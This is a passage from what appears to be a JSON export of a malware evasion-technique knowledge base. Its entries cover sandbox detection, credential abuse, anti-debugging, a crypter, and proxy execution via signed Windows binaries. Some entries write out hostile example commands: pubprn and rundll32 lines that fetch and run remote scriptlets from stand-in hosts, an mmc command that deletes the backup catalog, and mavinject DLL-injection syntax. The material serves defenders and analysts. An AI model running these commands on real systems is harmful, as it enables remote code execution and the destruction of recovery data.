            "tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME),\r\nsandbox,\r\nmonitor mouse clicks,",
            "modification_date": "2023-10-04T10:43:55.889000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 347,
            "key": "virtualizationsandbox-evasion-system-checks",
            "unprotect_id": "T1497.001",
            "name": "Virtualization/Sandbox Evasion: System Checks",
            "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\r\n\r\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.\r\n\r\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.\r\n\r\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions. In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.\r\n\r\nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.",
            "resources": "https://attack.mitre.org/techniques/T1497/001/",
            "creation_date": "2023-03-20T23:50:55.107000Z",
            "tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME) detection,\r\nsandbox detection,\r\nVME artifacts,\r\nWindows Management Instrumentation, \r\nPowerShell, \r\nSystem Information Discovery, \r\nQuery Registry ,\r\nhost/domain name,\r\nnetwork traffic,\r\nhardware info,\r\nVMWare,\r\nvirtualisation,",
            "modification_date": "2023-10-04T10:43:55.298000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 346,
            "key": "valid-accounts-local-accounts",
            "unprotect_id": "T1078.003",
            "name": "Valid Accounts: Local Accounts",
            "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\r\n\r\nLocal Accounts may also be abused to elevate privileges and harvest credentials through OS Credential Dumping. Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.",
            "resources": "https://attack.mitre.org/techniques/T1078/003/",
            "creation_date": "2023-03-20T23:47:08.395000Z",
            "tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation, \r\nInitial Access,\r\nOS Credential Dumping,\r\nPassword reuse,\r\nweak passwords,\r\nlateral movement,",
            "modification_date": "2023-10-04T10:44:50.140000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 345,
            "key": "valid-accounts-domain-accounts",
            "unprotect_id": "T1078.002",
            "name": "Valid Accounts: Domain Accounts",
            "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\r\n\r\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as OS Credential Dumping or password reuse, allowing access to privileged resources of the domain.",
            "resources": "https://attack.mitre.org/techniques/T1078/002/",
            "creation_date": "2023-03-20T23:45:20.275000Z",
            "tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation, \r\nInitial Access,\r\nActive Directory Domain Services,\r\nOS Credential Dumping,\r\npassword reuse,\r\nweak passwords,\r\nprivileged domain resources,\r\nlateral movement,",
            "modification_date": "2023-10-04T10:43:30.236000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 344,
            "key": "valid-accounts-default-accounts",
            "unprotect_id": "T1078.001",
            "name": "Valid Accounts: Default Accounts",
            "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.\r\n\r\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.",
            "resources": "https://attack.mitre.org/techniques/T1078/001/",
            "creation_date": "2023-03-20T23:43:16.770000Z",
            "tags": "Defense Evasion, \r\nPersistence, \r\nPrivilege Escalation,\r\nInitial Access,\r\nbuilt-into an OS accounts,\r\nadmin accounts,\r\nguest accounts,\r\npublicly disclosed credentials,\r\nstolen credentials,\r\nstolen private keys,\r\nremote access,",
            "modification_date": "2023-10-04T10:44:49.175000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 343,
            "key": "scrubcrypt",
            "unprotect_id": "U1430",
            "name": "ScrubCrypt",
            "description": "ScrubCrypt is a malware obfuscation and encryption framework, derived from the earlier JLaive Batchfuscator crypter. It is designed to aid cybercriminals in evading detection and analysis by using a variety of techniques to conceal and protect the malicious software.\r\n\r\nScrubCrypt is advertised on cybercrime forums to employ encryption, code morphing, and (allegedly) polymorphism to create obfuscated malware payloads that are challenging to reverse-engineer and detection.\r\n\r\nThe Batch files generated by ScrubCrypt contain a Base64 encoded, AES-128-CBC encrypted and gzip compressed payload, which is executed / reflectively loaded.",
            "resources": "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nhttps://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt\r\nhttps://twitter.com/SI_FalconTeam/status/1742527508682072179",
            "creation_date": "2023-03-19T23:57:01.684000Z",
            "tags": "packers, ScrubCrypt, obfuscation",
            "modification_date": "2024-01-03T22:08:51.890000Z",
            "category": [
                12
            ],
            "rules": [
                135
            ],
            "attachments": [],
            "featured_api": [],
            "contributors": [
                30
            ]
        },
        {
            "id": 342,
            "key": "constant-blinding",
            "unprotect_id": "U0707",
            "name": "Constant Blinding",
            "description": "Constant blinding can be employed by malware authors to obfuscate their malicious code, making it harder for security researchers and antivirus software to detect and analyze the malware. By using constant blinding techniques, the malware code can be concealed, increasing its chances of evading detection and maintaining persistence on the target system.\r\n\r\nHere's how constant blinding can be utilized in malware:\r\n\r\n1. Obfuscating malicious constants: Malware may contain specific constants, such as IP addresses or URLs for command and control (C2) servers or specific strings used as encryption keys. By applying constant blinding, these constants can be hidden, making it difficult for researchers to identify the purpose of the constant or uncover the C2 infrastructure.\r\n\r\n2. Concealing code patterns: Antivirus software often relies on signature-based detection, which looks for known patterns of code within the executable. By applying constant blinding to the malware code, these recognizable patterns can be obscured, helping the malware evade signature-based detection.\r\n\r\n2. Hiding exploit payloads: In a multi-stage attack, constant blinding can be used to conceal the payload of an exploit. By XORing the payload with a randomly generated key, the true nature of the payload is hidden until it is executed on the target system, making it more challenging for security tools to identify the malicious payload.\r\n\r\n3. Encrypted communication: Constant blinding techniques can be used to encrypt communication between the malware and the C2 server. By XORing the data transmitted with a randomly generated key, the malware can protect the confidentiality of the communication and make it more challenging for researchers to intercept and analyze the data.",
            "resources": "https://hal.inria.fr/hal-01382971/file/PID4513621.pdf",
            "creation_date": "2023-03-19T23:46:54.952000Z",
            "tags": "Constant blinding, Malware, Obfuscation, constant blinding techniques, encryption keys, code patterns, signature-based detection, recognizable patterns, exploit payloads, XORing, randomly generated key, encrypted communication,",
            "modification_date": "2023-10-04T10:44:38.658000Z",
            "category": [
                7
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 341,
            "key": "unloading-module-with-freelibrary",
            "unprotect_id": "U0519",
            "name": "Unloading Module with FreeLibrary",
            "description": "Malware authors often use various techniques to evade detection by AV/EDR solutions. One such technique involves checking for the presence of AV/EDR DLLs that may be loaded in the malware's address space and attempting to unload them before executing their malicious code.\r\n\r\nTo do this, the malware first uses the `GetModuleHandleA` function to retrieve a handle to the DLL, if it's already loaded. Once it has a valid handle, the malware then calls the `FreeLibrary` function to free and unload the DLL from memory.\r\n\r\nBy unloading the AV/EDR DLL, the malware can avoid detection and carry out its malicious activities without being monitored or blocked by the security software. However, it is important to note that this technique only affects user-mode components of an EDR and not kernel components. Additionally, modern EDR systems have evolved to detect such evasive techniques and prevent malware from disabling them.",
            "resources": "http://malwarejake.blogspot.com/2013/07/interesting-malware-defense.html\nhttps://rstforums.com/forum/topic/110743-make-your-dynamic-module-unfreeable-anti-freelibrary/\nhttps://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
            "creation_date": "2023-03-19T22:08:54.336000Z",
            "tags": "Malware, AV/EDR, detection, DLL, address space, unload, GetModuleHandleA, FreeLibrary,",
            "modification_date": "2023-10-04T10:44:48.899000Z",
            "category": [
                2
            ],
            "rules": [
                133
            ],
            "attachments": [],
            "featured_api": [
                375,
                376
            ],
            "contributors": []
        },
        {
            "id": 340,
            "key": "addvectoredexceptionhandler",
            "unprotect_id": "U0125",
            "name": "AddVectoredExceptionHandler",
            "description": "The `AddVectoredExceptionHandler` technique is an anti-debugging method that can detect the presence of debuggers using Vectored Exception Handlers. This technique works by calling `AddVectoredExceptionHandler(1, ourHandler)` to register a top-level exception handler that will catch any exceptions raised by the process, including those generated by debuggers.\r\n\r\nAfter this call has taken place, stepping through the code will trigger an `EXCEPTION_SINGLE_STEP` exception, which is caught by our top-level handler. This exception is typically only generated by debuggers and is therefore a strong indicator that a debugger is present.",
            "resources": "https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-addvectoredexceptionhandler",
            "creation_date": "2023-03-10T02:40:20.368000Z",
            "tags": "Anti-debugging, Vectored Exception Handlers, AddVectoredExceptionHandler, Debugging, Exception handling, EXCEPTION_SINGLE_STEP",
            "modification_date": "2023-10-04T10:44:23.409000Z",
            "category": [
                3
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [
                593
            ],
            "contributors": []
        },
        {
            "id": 339,
            "key": "call-to-interrupt-procedure",
            "unprotect_id": "U0124",
            "name": "Call to Interrupt Procedure",
            "description": "This anti-debugging technique involves using the `INT n` instruction to generate a call to the interrupt or exception handler specified with the destination operand.\r\n\r\nTo implement this technique, the int `0x03` instruction is executed, followed by a `ret` (0xCD03, 0xC3) nested in a `__try, __except block`. If a debugger is present, the except block will not be executed, and the function will return TRUE, indicating that a debugger is running.\r\n\r\nThis technique can be used to prevent analysts from analyzing and manipulating the malware's code during runtime.",
            "resources": "http://www.nacad.ufrj.br/online/intel/vtune/users_guide/mergedProjects/analyzer_ec/mergedProjects/reference_olh/mergedProjects/instructions/instruct32_hh/vc140.htm",
            "creation_date": "2023-03-10T02:29:39.347000Z",
            "tags": "Anti-debugging, X86 instruction, RET",
            "modification_date": "2023-10-04T10:44:25.147000Z",
            "category": [
                3
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 338,
            "key": "use-alternate-authentication-material-pass-the-ticket",
            "unprotect_id": "T1550.003",
            "name": "Use Alternate Authentication Material: Pass the Ticket",
            "description": "Adversaries may \"pass the ticket\" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\r\n\r\nWhen preforming PtT, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.\r\n\r\nA Silver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).\r\n\r\nA Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.\r\n\r\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. Pass the Hash) while also using the password hash to create a valid Kerberos ticket",
            "resources": "https://attack.mitre.org/techniques/T1550/003/",
            "creation_date": "2023-03-07T04:14:30.236000Z",
            "tags": "Defense Evasion, \r\nLateral Movement,\r\nstolen password hashes,\r\nstolen AES keys,\r\nbypass system access controls,\r\nKerberos authentication,\r\nPtT,\r\nOS Credential Dumping,\r\nTicket Granting Ticket (TGT),\r\nTicket Granting Service (TGS),\r\nSilver Ticket,\r\nGolden Ticket,\r\nKey Distribution Service account KRBTGT account NTLM hash,\r\nKerberos ticket,\r\noverpassing the hash,\r\nPass the Hash,\r\nAPT28,\r\nAPT32,",
            "modification_date": "2023-10-04T10:43:42.393000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 337,
            "key": "use-alternate-authentication-material-pass-the-hash",
            "unprotect_id": "T1550.002",
            "name": "Use Alternate Authentication Material: Pass the Hash",
            "description": "Adversaries may \"pass the hash\" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\r\n\r\nWhen performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\r\n\r\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform Pass the Ticket attacks",
            "resources": "https://attack.mitre.org/techniques/T1550/002/",
            "creation_date": "2023-03-07T04:08:51.289000Z",
            "tags": "Defense Evasion, \r\nLateral Movement,\r\nstolen password hashes,\r\nbypass system access controls,\r\nbypass standard authentication steps,\r\nPtH,\r\nCredential Access,\r\noverpass the hash,\r\nKerberos ticket,\r\nPass the Ticket,\r\nAPT1,\r\nAPT28,\r\nAPT32,",
            "modification_date": "2023-10-04T10:44:24.203000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 336,
            "key": "trusted-developer-utilities-proxy-execution-msbuild",
            "unprotect_id": "T1127.001",
            "name": "Trusted Developer Utilities Proxy Execution: MSBuild",
            "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.\r\n\r\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution",
            "resources": "https://attack.mitre.org/techniques/T1127/001/",
            "creation_date": "2023-03-07T04:04:33.351000Z",
            "tags": "Defense Evasion,\r\nproxy execution of malicious code,\r\nMSBuild.exe (Microsoft Build Engine),\r\nexecute arbitrary code,\r\nbypass application control defenses,\r\n.NET Framework 4,",
            "modification_date": "2023-10-04T10:44:15.323000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 335,
            "key": "traffic-signaling-socket-filters",
            "unprotect_id": "T1205.002",
            "name": "Traffic Signaling: Socket Filters",
            "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\r\n\r\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria. Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with Protocol Tunneling.\r\n\r\nFilters can be installed on Windows hosts using Winpcap.",
            "resources": "https://attack.mitre.org/techniques/T1205/002/",
            "creation_date": "2023-03-07T03:59:35.951000Z",
            "tags": "Defense Evasion, \r\nPersistence, \r\nCommand and Control,\r\nnetwork socket filtering,\r\nactivate backdoors,\r\nWinpcap,\r\nProtocol Tunneling,\r\nraw socket connections,",
            "modification_date": "2023-10-04T10:43:35.310000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 334,
            "key": "traffic-signaling-port-knocking",
            "unprotect_id": "T1205.001",
            "name": "Traffic Signaling: Port Knocking",
            "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\r\n\r\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\r\n\r\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
            "resources": "https://attack.mitre.org/techniques/T1205/001/",
            "creation_date": "2023-03-07T03:54:15.801000Z",
            "tags": "Defense Evasion, \r\nPersistence, \r\nCommand and Control,\r\nhide open ports,\r\ndynamic opening of a listening port,\r\nconnection to listening servers,\r\nlibpcap libraries,\r\nraw sockets,",
            "modification_date": "2023-10-04T10:44:23.953000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 333,
            "key": "template-injection",
            "unprotect_id": "T1221",
            "name": "Template Injection",
            "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.\r\n\r\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\r\n\r\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.\r\n\r\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.\r\n\r\nThis technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt",
            "resources": "https://attack.mitre.org/techniques/T1221/",
            "creation_date": "2023-03-07T03:50:18.208000Z",
            "tags": "Defense Evasion,\r\n.docx, \r\n.xlsx, \r\n.pptx, \r\n.dot,\r\nconceal malicious code in documents,\r\ndocument injection,\r\n*\\template control word,\r\n.rtf file,\r\nForced Authentication,\r\nAPT28,\r\nmalicious macros,",
            "modification_date": "2023-10-04T10:44:29.999000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 332,
            "key": "system-script-proxy-execution-pubprn",
            "unprotect_id": "T1216.001",
            "name": "System Script Proxy Execution: PubPrn",
            "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.\r\n\r\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites. To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\r\n\r\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).",
            "resources": "https://attack.mitre.org/techniques/T1216/001/",
            "creation_date": "2023-03-07T03:44:50.264000Z",
            "tags": "Defense Evasion,\r\nproxy execution of malicious remote files,\r\nPubPrn.vbs,\r\nCscript.exe,\r\nexecute malicious remote payloads,\r\nscript: parameter,\r\nscriptlet file (.sct),\r\nbypass signature validation restrictions,\r\nbypass application control solutions,\r\nAPT32,",
            "modification_date": "2023-10-04T10:44:23.698000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 331,
            "key": "system-binary-proxy-execution-mmc",
            "unprotect_id": "T1218.014",
            "name": "System Binary Proxy Execution: MMC",
            "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt. MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.\r\n\r\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode. Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.\r\n\r\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. Inhibit System Recovery) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).\r\n\r\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a Component Object Model class object.[6] Then, adversaries may create custom consoles with the \"Link to Web Address\" snap-in that is linked to the malicious CLSID subkey.[7] Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc",
            "resources": "https://attack.mitre.org/techniques/T1218/014/",
            "creation_date": "2023-03-05T00:58:16.050000Z",
            "tags": "Defense Evasion,\r\n.msc files,\r\nMicrosoft Management Console (MMC),\r\nsnap-ins,\r\nmmc gpedit.msc,\r\nmmc C:\\Users\\*\\admintools.msc /a,\r\nmmc.exe -Embedding,\r\nInhibit System Recovery,\r\nClass Identifier (CLSID) subkey,\r\nComponent Object Model class object,\r\nLink to Web Address,",
            "modification_date": "2023-10-04T10:44:29.845000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 330,
            "key": "system-binary-proxy-execution-mavinject",
            "unprotect_id": "T1218.013",
            "name": "System Binary Proxy Execution: Mavinject",
            "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).\r\n\r\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL). Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.\r\n\r\nIn addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.",
            "resources": "https://attack.mitre.org/techniques/T1218/013/",
            "creation_date": "2023-03-05T00:51:58.680000Z",
            "tags": "Defense Evasion,\r\nmavinject.exe,\r\nMicrosoft Application Virtualization Injector,\r\ninject code into external processes,\r\nproxying execution,\r\n/HMODULE,\r\nmavinject.exe PID /INJECTRUNNING,",
            "modification_date": "2023-10-04T10:43:34.060000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 329,
            "key": "system-binary-proxy-execution-verclsid",
            "unprotect_id": "T1218.012",
            "name": "System Binary Proxy Execution: Verclsid",
            "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.\r\n\r\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to Regsvr32). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.",
            "resources": "https://attack.mitre.org/techniques/T1218/012/",
            "creation_date": "2023-03-05T00:27:25.765000Z",
            "tags": "Defense Evasion,\r\nverclsid.exe,\r\nExtension CLSID Verification Host,\r\nverifying shell extensions,\r\nexecute malicious payloads,\r\nverclsid.exe /S /C {CLSID},\r\nCOM objects,\r\nbypass application control solutions,\r\ndownload malicious scripts,\r\nexecute malicious scripts,",
            "modification_date": "2023-10-04T10:43:31.280000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 328,
            "key": "system-binary-proxy-execution-rundll32",
            "unprotect_id": "T1218.011",
            "name": "System Binary Proxy Execution: Rundll32",
            "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\r\n\r\nRundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.\r\n\r\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. \r\n\r\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\r\n\r\nAdditionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.",
            "resources": "https://attack.mitre.org/techniques/T1218/011/",
            "creation_date": "2023-03-05T00:24:36.312000Z",
            "tags": "Defense Evasion,\r\nrundll32.exe {DLLname, DLLfunction},\r\nexecute Control Panel Item files (.cpl),\r\nControl_RunDLL, Control_RunDLLAsUser,\r\nrundll32.exe javascript:\r\nobfuscate malicious code,\r\nMasquerading,\r\nAPT19,\r\nAPT28,\r\nAPT29,\r\nAPT3,\r\nAPT32,\r\nAPT38\r\nAPT41,\r\nmaintain persistence,\r\ninject malicious payload,\r\nexecute malicious DLLs,",
            "modification_date": "2023-10-04T10:44:23.236000Z",
            "category": [
                10
            ],
            "rules": [],
            "attachments": [],
            "featured_api": [],
            "contributors": []
        },
        {
            "id": 327,
            "key": "system-binary-proxy-execution-regsvr32",
            "unprotect_id": "T1218.010",
            "name": "System Binary Proxy Execution: Regsvr32",
